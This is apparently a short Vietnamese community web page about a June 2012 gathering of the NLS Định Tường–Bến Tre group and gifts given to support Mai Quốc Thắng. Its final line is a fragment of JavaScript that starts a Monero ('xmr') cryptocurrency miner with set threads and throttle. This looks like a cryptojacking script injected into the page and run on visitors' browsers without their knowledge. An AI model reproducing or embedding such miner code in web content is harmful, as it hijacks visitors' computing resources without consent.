Họp mặt ngày 03/06/2012
HỖ TRỢ ANH MAI QUỐC THẮNG
Anh Nguyễn Đình Thái trao quà cho vợ anh Mai Quốc Thắng - NLSBT
PHÁI ĐOÀN NLS ĐỊNH TƯỜNG- BẾN TRE DỰ HỌP
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();